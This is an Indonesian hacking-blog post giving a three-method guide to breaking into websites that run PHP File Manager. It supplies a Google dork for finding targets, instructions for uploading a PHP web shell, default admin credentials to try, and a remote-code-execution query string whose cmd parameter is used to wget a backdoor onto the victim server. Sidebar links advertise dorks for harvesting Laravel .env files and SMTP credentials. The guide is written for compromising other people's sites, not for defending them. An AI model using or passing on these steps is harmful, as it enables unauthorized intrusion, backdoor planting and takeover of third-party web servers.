Who is the owner of this site?

This website is created by Jubayer Ahmed and his friends.

This website provides paid files?

No, this website provided 99.9% free files.

What does this website provide?

This Website provides Free Premium Blogger Template Download, Blogger Widget Code, Blogger Tool Script, Blogger wishing website Script, Wordpress Theme, Wordpress Plugin etc.

How does this website earn money?

This website earns money showing you google ads.

This website provides you virus files?

No, this website provides you virus free files.

How does this website find these files?

This website collects all files from open source platform.

Beranda

Vulnerability

3 Cara Upload Shell PHP filemanager

Dork:intitle:"PHP File Manager" ext:php (kembangin)
Ada 3 Cara:

1.Langsung Upload Shell

2.PHP Filemanager Default Us/Pw

3.PHP Filemanager RCE

Ok langsung aja ke yang pertama pertama kalian dorking pakai dork diatas kembangin lagi biar dapet yang fresh dan banyak
Dicara Yang Pertama Kalian Bisa Lansung Upload Shell kalian karena PHP Filemanager nya lansung kebuka seperti tampilan di gambar dibawah

Cara Upload Shellnya:Klik Upload > Upload shell mu ext : .php .phtml .php5 .php.fla .php.asolokentot:v
Bila Vuln Shell Akan Lansung Ke Upload Dan untuk Akses Tergantung Upload Di directory mana ( TERGANGUNG WEB)
Ok Lanjut Ke Cara Yang Kedua Biasany PHP Filemanager suka ada yang disuruh login,Nah bila nemu yang seperti itu :(, sans jgn sedih dulu, kita coba aja masukin username & password nya ini

Username : fm_admin

Password : fm_admin
Bila Masuk Akan Ada Bacaan :You are logged in , tau kan artinya apa? yap kita udh berhasil login pakai username dan password diatas
Nah kalau sudah login, bebas mau lo apain, upload shell juga bisa, jungkir balik juga bisa tampilan sesudah login
Note : USERNAME SAMA PASSWORD YANG TADI GW KASIH, GK SEMUA BISA DI PHP FILE MANAGER LAINNYA
Jadi Bila Tidak Bisa Memakai Cara Kedua OK kita coba yang terakhir
Kalo Sudah Begitu Kita Coba RCE
Parameter GET : ?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=
OK Lansung Aja
Masukan parameter di atas setelah phpfm.php (atau nama lain tempat filemanager tersebut) Bila Vuln Biasanya Ada Bacaan Error: Command not informed
Bingo Bila Nemu Yang Seperti itu lanjut kita coba wget backdoor , berikut command wget bagi yang belum tau :
command : wget https://site.com/file.php wget https://site.com/file.php -O gans.php
bila sudah wget backdoorny coba kita cek apakah ada atau tidaknya file
kita caranya: cukup site.com/phpfm.php?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=wget
Bila File yang kita wget ada disitu berarti shell kalian sudah terupload
Sekian dari Saya mohon maaf bila ada salah ketik ataupun ucapan
Thanks to:Phantom Ghost , Maxteroit , And All My Friend
#Thanks Authornya Podol :v

Blog-Gan.Org | Technology & Informasi

3 Cara Upload Shell PHP filemanager

Posting Komentar

Tools Reverse Ip Multithreading Free Download

Dork .env Untuk Mencari List LARAVEL Dan SMTP - Blog-Gan

Cara Mendapatkan Big List Site Laravel + New Fresh Dork Laravel

Tools Priv Get Website List Free Download

God of War PS5 Mendapat Nama Resmi, Perawatan Logo Baru